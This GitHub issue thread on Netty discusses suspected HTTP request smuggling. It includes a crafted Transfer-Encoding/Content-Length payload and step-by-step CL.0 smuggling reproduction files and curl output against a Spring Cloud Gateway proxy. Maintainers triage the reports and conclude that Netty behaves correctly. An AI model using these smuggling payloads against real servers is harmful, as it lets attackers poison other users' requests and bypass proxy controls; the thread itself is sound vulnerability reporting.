### ISSUE TITLE
Prevent Http Request Smuggling in Netty-4.1.96

### ISSUE THREAD

**Issue by AkashMaharana** [netty/netty#13706]
### Expected behavior
I am working on a application based on Netty. Recently from our security scanner, we got to know that our application is vulnerable to Http Request Smuggling Attack. Post to that I did some exploration on this attack https://portswigger.net/web-security/request-smuggling and identified that this attack can be possible by assigning a crafted message body to a Http Request. To understand the standards of a message body, I checked the RFC doc https://datatracker.ietf.org/doc/html/rfc9112#message.body.length.

So I tried to implement those validations in my project but later find out that these are already handled in Netty wrt addressing couple of vulnerabilities.

As per the vulnerability description and behaviour part of the http request will be processed in the first request and the remaining part will be there in the buffer. The part of the request what was left in buffer is going to be used in the subsequent request to make the attack happen.

I tried to implement a solution by writing a costume Http Request Aggregator where I will read the http request till I received the final chunk then flush the buffer. But I got stuck and the solution is also not working.

### Actual behavior
While simulating with the a crafted payload Transfer-Encoding overrides Content-Length and till 0 I get in the first request body. The later part will be there in buffer and will get concatenated to the second request to make the attack happen.

Is there a way to read the http content from http request and clean the buffer after processing of each request in Netty? So that this attack can be prevented? If my understanding is wrong then please let me know how Netty works with buffer.

Any working solution / fix will be greatly appreciated.

### Minimal yet complete reproducer code (or URL to code)

Example of the crafted request

`POST /broker/xml HTTP/1.1
Host: burp.ssdevrd.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Connection: keep-alive
Transfer-Encoding: chunked
Content-Length:47

0

GET /portal HTTP/1.0
Host: google.com
X:X`

### Netty version

4.1.96

### JVM version (e.g. `java -version`)

JDK17

**Comment by AkashMaharana** [comment]
@normanmaurer Can you please share your inputs.

**Comment by normanmaurer** [comment]
@AkashMaharana  can you please share your whole pipeline setup ?

**Comment by kenballus** [comment]
I think this person is mistaken. I've tested, and Netty correctly prioritizes `Transfer-Encoding` over `Content-Length` in the provided example.

**Comment by AndreasKasparek** [comment]
Hi @kenballus @normanmaurer @AkashMaharana,

It seems I might have a related issue to this one. If you think that is not the case, please move my comment to a new issue instead or point me in the right direction. Thanks!

**Background**
We are running a Spring Cloud Gateway as a web proxy in front of our micro-services. Our company has recently undergone our regular penetration test with an external security company and they filed a vulnerability finding called [Http Request Smuggling CL.0](https://portswigger.net/web-security/request-smuggling/browser/cl-0). I tried to investigate where the root cause is and debugged our gateway. As far as I can tell, the error is somewhere deep down in the Netty stack. Unfortunately I was not able to clearly pinpoint it because I have no in-depth knowledge of the Netty code and the whole reactive stack is sometimes hard to analyze. I had the impression that the issue might be in the netty.io components and not in projectreactor.io.

**Issue**
It is possible to send an HTTP request using `HTTP/1.1` with a `Content-Length: 0` header and non-empty data in the request body. Netty server seems to accept such requests without error. Class methods that read and return the body from the request seem to disregard the sent data (probably because of the zero size header) and return just empty. But the request payload itself seems to stay in the incoming request chain/socket buffer and may be executed the next time a request is handled. This allows an attacker to smuggle in other requests. In my tests it was irrelevant if the request method was GET or POST, the result was the same.

**How to reproduce**
As mentioned, I am normally not working with Netty directly, therefore I leave it to you to find a minimal proof of concept here. I was able to reproduce it with the latest Spring Cloud Gateway project (spring-cloud-gateway-starter:4.1.5) which runs on netty-reactor-http:1.1.22 and netty-handler-proxy:4.1.113. The following steps describe how to reproduce it:

1. Set up a minimal Spring Cloud Gateway project using Spring's Initializr: https://start.spring.io/#!type=maven-project&language=java&platformVersion=3.3.4&packaging=jar&jvmVersion=17&groupId=io.netty&artifactId=http.smuggling&name=netty.http.smuggling&description=Proof%20of%20concept%20for%20CL.0&packageName=io.netty.http.smuggling&dependencies=cloud-gateway-reactive

2. Add the following bean creation method into the Application class to configure a simple forwarding route that passed all requests along to httpbin.org:
```
@Bean
    public RouteLocator routes(RouteLocatorBuilder builder) {
        return builder.routes()
                .route(p -> p
                        .path("/get/**")
                        .uri("http://httpbin.org:80"))
                .build();
    }
```

3. Run the application. You can now send requests to `http://localhost:8080/get` which will be forwarded to httpbin.org and the response will be returned. Continue with the following steps to demonstrate the problem:

4. Create a new text file `first.txt` with this content:
```
url = "http://localhost:8080/get?type=poisoning_request"
request = "GET"
header = "Content-Length: 0"
data-binary = "GET /get?type=smuggled_request HTTP/1.1\r\nHost: localhost:8080\r\n\r\n"
verbose
insecure
```

5. Create another text file `second.txt`with this content:
```
url = "http://localhost:8080/get?type=followup_request"
verbose
insecure
```

6. Run the following command in a shell: `curl --config first.txt --next --config second.txt`. Curl fires two GET requests: the first one contains the query string parameter `type=poisoning_request`. Even so it is a GET, there is a request body that contains another HTTP request with query string parameter `type=smuggled_request`. Then Curl sends a second GET request with query parameter `type=followup_request`.

**Expected Output**
I would expect to see the two main HTTP requests being sent and as response from the gateway the httpbin.org output for the `poisoning_request` and the `followup_request`. The body content of the first request should be completely ignored and not affect the outcome in any way.

**Actual Output**
The first request responds as expected, but the second request instead returns the output of the smuggled request from the first's request body:

```% curl --config first.txt --next --config second.txt
* Host localhost:8080 was resolved.
* IPv6: ::1
* IPv4: 127.0.0.1
*   Trying [::1]:8080...
* Connected to localhost (::1) port 8080
> GET /get?type=poisoning_request HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/8.7.1
> Accept: */*
> Content-Length: 0
> Content-Type: application/x-www-form-urlencoded
> 
* upload completely sent off: 65 bytes
< HTTP/1.1 200 OK
< Date: Fri, 04 Oct 2024 14:41:16 GMT
< Content-Type: application/json
< Content-Length: 589
< Server: gunicorn/19.9.0
< Access-Control-Allow-Origin: *
< Access-Control-Allow-Credentials: true
< 
{
  "args": {
    "type": "poisoning_request"
  }, 
  "headers": {
    "Accept": "*/*", 
    "Content-Length": "0", 
    "Content-Type": "application/x-www-form-urlencoded", 
    "Forwarded": "proto=http;host=\"localhost:8080\";for=\"[0:0:0:0:0:0:0:1]:50810\"", 
    "Host": "httpbin.org", 
    "User-Agent": "curl/8.7.1", 
    "X-Amzn-Trace-Id": "Root=1-66fffe8c-3bb3ddf57837d79444149b24", 
    "X-Forwarded-Host": "localhost:8080", 
    "Z-Forwarded-For": "AAAAAAAAAAAAAAA"
  }, 
  "origin": "2.212.16.50, 136.226.162.100", 
  "url": "http://localhost:8080/get?type=poisoning_request"
}
* Connection #0 to host localhost left intact
* Found bundle for host: 0x600000f60b70 [serially]
* Can not multiplex, even if we wanted to
* Re-using existing connection with host localhost

> GET /get?type=followup_request HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/8.7.1
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Fri, 04 Oct 2024 14:41:16 GMT
< Content-Type: application/json
< Content-Length: 538
< Server: gunicorn/19.9.0
< Access-Control-Allow-Origin: *
< Access-Control-Allow-Credentials: true
< 
{
  "args": {
    "type": "smuggled_request"
  }, 
  "headers": {
    "Accept": "*/*", 
    "Content-Length": "0", 
    "Forwarded": "proto=http;host=\"localhost:8080\";for=\"[0:0:0:0:0:0:0:1]:50810\"", 
    "Host": "httpbin.org", 
    "User-Agent": "ReactorNetty/1.1.22", 
    "X-Amzn-Trace-Id": "Root=1-66fffe8c-39e8f6a935adb9807344c35c", 
    "X-Forwarded-Host": "localhost:8080", 
    "Z-Forwarded-For": "AAAAAAAAAAAAAAA"
  }, 
  "origin": "2.212.16.50, 136.226.162.100", 
  "url": "http://localhost:8080/get?type=smuggled_request"
}
* Connection #0 to host localhost left intact
```

**Comment by kenballus** [comment]
> Hi @normanmaurer @AkashMaharana,
> 
> It seems I might have a related issue to this one. If you think that is not the case, please move my comment to a new issue instead or point me in the right direction. Thanks!
> 
> **Background** We are running a Spring Cloud Gateway as a web proxy in front of our micro-services. Our company has recently undergone our regular penetration test with an external security company and they filed a vulnerability finding called [Http Request Smuggling CL.0](https://portswigger.net/web-security/request-smuggling/browser/cl-0). I tried to investigate where the root cause is and debugged our gateway. As far as I can tell, the error is somewhere deep down in the Netty stack. Unfortunately I was not able to clearly pinpoint it because I have no in-depth knowledge of the Netty code and the whole reactive stack is sometimes hard to analyze. I had the impression that the issue might be in the netty.io components and not in projectreactor.io.
> 
> **Issue** It is possible to send an HTTP request using `HTTP/1.1` with a `Content-Length: 0` header and non-empty data in the request body. Netty server seems to accept such requests without error. Class methods that read and return the body from the request seem to disregard the sent data (probably because of the zero size header) and return just empty. But the request payload itself seems to stay in the incoming request chain/socket buffer and may be executed the next time a request is handled. This allows an attacker to smuggle in other requests. In my tests it was irrelevant if the request method was GET or POST, the result was the same.
> 
> **How to reproduce** As mentioned, I am normally not working with Netty directly, therefore I leave it to you to find a minimal proof of concept here. I was able to reproduce it with the latest Spring Cloud Gateway project (spring-cloud-gateway-starter:4.1.5) which runs on netty-reactor-http:1.1.22 and netty-handler-proxy:4.1.113. The following steps describe how to reproduce it:
> 
>     1. Set up a minimal Spring Cloud Gateway project using Spring's Initializr: https://start.spring.io/#!type=maven-project&language=java&platformVersion=3.3.4&packaging=jar&jvmVersion=17&groupId=io.netty&artifactId=http.smuggling&name=netty.http.smuggling&description=Proof%20of%20concept%20for%20CL.0&packageName=io.netty.http.smuggling&dependencies=cloud-gateway-reactive
> 
>     2. Add the following bean creation method into the Application class to configure a simple forwarding route that passes all requests along to `httpbin.org` and returns its response:
> 
> 
> ```
>     @Bean
>     public RouteLocator routes(RouteLocatorBuilder builder) {
>         return builder.routes()
>                 .route(p -> p
>                         .path("/get/**")
>                         .uri("http://httpbin.org:80"))
>                 .build();
>     }
> ```
> 
>     3. Run the application. You can now send requests to `http://localhost:8080/get` which will be forwarded to httpbin.org and the response will be returned. Continue with the following steps to demonstrate the problem:
> 
>     4. Create a new text file `first.txt` with this content:
> 
> 
> ```
> url = "http://localhost:8080/get?type=poisoning_request"
> request = "GET"
> header = "Content-Length: 0"
> data-binary = "GET /get?type=smuggled_request HTTP/1.1\r\nHost: localhost:8080\r\n\r\n"
> verbose
> insecure
> ```
> 
>     5. Create another text file `second.txt`with this content:
> 
> 
> ```
> url = "http://localhost:8080/get?type=followup_request"
> verbose
> insecure
> ```
> 
>     6. Run the following command in a shell: `curl --config first.txt --next --config second.txt`. Curl fires two GET requests: the first one contains the query string parameter `type=poisoning_request`. Even so it is a GET, there is a request body that contains another HTTP request with query string parameter `type=smuggled_request`. Then Curl sends a second GET request with query parameter `type=followup_request`.
> 
> 
> **Expected Output** I would expect to see the two main HTTP requests being sent and as response from the gateway the httpbin.org output for the `poisoning_request` and the `followup_request`. The body content of the first request should be completely ignored and not affect the outcome in any way.
> 
> **Actual Output** The first request responds as expected, but the second request instead returns the output of the smuggled request from the first's request body:
> 
> ```
> % curl --config first.txt --next --config second.txt
> * Host localhost:8080 was resolved.
> * IPv6: ::1
> * IPv4: 127.0.0.1
> *   Trying [::1]:8080...
> * Connected to localhost (::1) port 8080
> > GET /get?type=poisoning_request HTTP/1.1
> > Host: localhost:8080
> > User-Agent: curl/8.7.1
> > Accept: */*
> > Content-Length: 0
> > Content-Type: application/x-www-form-urlencoded
> > 
> * upload completely sent off: 65 bytes
> < HTTP/1.1 200 OK
> < Date: Fri, 04 Oct 2024 14:41:16 GMT
> < Content-Type: application/json
> < Content-Length: 589
> < Server: gunicorn/19.9.0
> < Access-Control-Allow-Origin: *
> < Access-Control-Allow-Credentials: true
> < 
> {
>   "args": {
>     "type": "poisoning_request"
>   }, 
>   "headers": {
>     "Accept": "*/*", 
>     "Content-Length": "0", 
>     "Content-Type": "application/x-www-form-urlencoded", 
>     "Forwarded": "proto=http;host=\"localhost:8080\";for=\"[0:0:0:0:0:0:0:1]:50810\"", 
>     "Host": "httpbin.org", 
>     "User-Agent": "curl/8.7.1", 
>     "X-Amzn-Trace-Id": "Root=1-66fffe8c-3bb3ddf57837d79444149b24", 
>     "X-Forwarded-Host": "localhost:8080", 
>     "Z-Forwarded-For": "AAAAAAAAAAAAAAA"
>   }, 
>   "origin": "xxxx, xxxx", 
>   "url": "http://localhost:8080/get?type=poisoning_request"
> }
> * Connection #0 to host localhost left intact
> * Found bundle for host: 0x600000f60b70 [serially]
> * Can not multiplex, even if we wanted to
> * Re-using existing connection with host localhost
> 
> > GET /get?type=followup_request HTTP/1.1
> > Host: localhost:8080
> > User-Agent: curl/8.7.1
> > Accept: */*
> > 
> * Request completely sent off
> < HTTP/1.1 200 OK
> < Date: Fri, 04 Oct 2024 14:41:16 GMT
> < Content-Type: application/json
> < Content-Length: 538
> < Server: gunicorn/19.9.0
> < Access-Control-Allow-Origin: *
> < Access-Control-Allow-Credentials: true
> < 
> {
>   "args": {
>     "type": "smuggled_request"
>   }, 
>   "headers": {
>     "Accept": "*/*", 
>     "Content-Length": "0", 
>     "Forwarded": "proto=http;host=\"localhost:8080\";for=\"[0:0:0:0:0:0:0:1]:50810\"", 
>     "Host": "httpbin.org", 
>     "User-Agent": "ReactorNetty/1.1.22", 
>     "X-Amzn-Trace-Id": "Root=1-66fffe8c-39e8f6a935adb9807344c35c", 
>     "X-Forwarded-Host": "localhost:8080", 
>     "Z-Forwarded-For": "AAAAAAAAAAAAAAA"
>   }, 
>   "origin": "xxxx, xxxx", 
>   "url": "http://localhost:8080/get?type=smuggled_request"
> }
> * Connection #0 to host localhost left intact
> ```

Can you reproduce this using only Netty, instead of the third party wrapping Netty? Can you also send a tcpdump on the side incoming to the Netty server, so we can see exactly what it received?

**Comment by AndreasKasparek** [comment]
Hi @kenballus,
Sorry, I have no experience with standalone Netty or how to get a hold of the tcpdump there. I assume you would be much faster to produce a minimal HTTP server setup (that just returns different static content for different query arguments) and just test my sample requests against it. Maybe you even have a unit test that you can adjust?
Thanks!

**Comment by kenballus** [comment]
> It is possible to send an HTTP request using HTTP/1.1 with a Content-Length: 0 header and non-empty data in the request body. Netty server seems to accept such requests without error. Class methods that read and return the body from the request seem to disregard the sent data (probably because of the zero size header) and return just empty. But the request payload itself seems to stay in the incoming request chain/socket buffer and may be executed the next time a request is handled. This allows an attacker to smuggle in other requests. In my tests it was irrelevant if the request method was GET or POST, the result was the same.

This is not a bug; it's a feature. When you send a message with a `Content-Length` of 0, and then send more bytes after it, those bytes are part of the next request. This is how connection reuse works in HTTP/1.1. Every modern web server does this. This is not request smuggling.

**Comment by kenballus** [comment]
> It seems to just sit there (not sure where, in the socket buffer?) and is only triggered when the third request is received by the server over the same connection. And b) when I send the third (follow-up) request that triggers the handling of the second request, I only get the response of the second request back but not the one for the third request.

Okay yeah, this does sound weird.

You need to look at a client-side `tcpdump` when you run that `curl` command in order to know what the responses should be.

First, you should see the following bytes go out:
```
    GET /get?type=poisoning_request HTTP/1.1
    Host: localhost:8080
    User-Agent: curl/8.6.0
    Accept: */*
    Content-Length: 0
    Content-Type: application/x-www-form-urlencoded

    GET /get?type=smuggled_request HTTP/1.1
    Host: localhost:8080
```
This is just 2 requests in a pipeline. Pipelining isn't well-supported by many HTTP servers, so you might only get 1 response to this payload. You should get 2 though.

Next, you should see these bytes go out:
```
    GET /get?type=followup_request HTTP/1.1
    Host: localhost:8080
    User-Agent: curl/8.6.0
    Accept: */*
```
Again, this is just a normal request, and should get a normal response.

If I send these to a Netty server built from source, then it responds in the way you'd expect. That is, it first responds to the first two requests, and then responds once.

This indicates that the behavior you're observing is due to some weird buffering in the reverse proxy. This could indicate a bug in Spring, so I'd report it there.

**Comment by AndreasKasparek** [comment]
Thanks for your help, @kenballus. I will open a bug report for Spring then. Just for completion I attached the tcpdump from my test, it shows the same result as the curl output: the smuggled request is not forwarded to httpbin.org until the follow-up request arrives but then replaces the follow-up.
[dump.txt](https://github.com/user-attachments/files/17918555/dump.txt)

**Comment by kenballus** [comment]
Funny; your Spring issue seems to have disappeared.

Sounds like the Spring people are taking this seriously :)

**Comment by chrisvest** [comment]
@kenballus Can we close this issue?

**Comment by kenballus** [comment]
Yes!
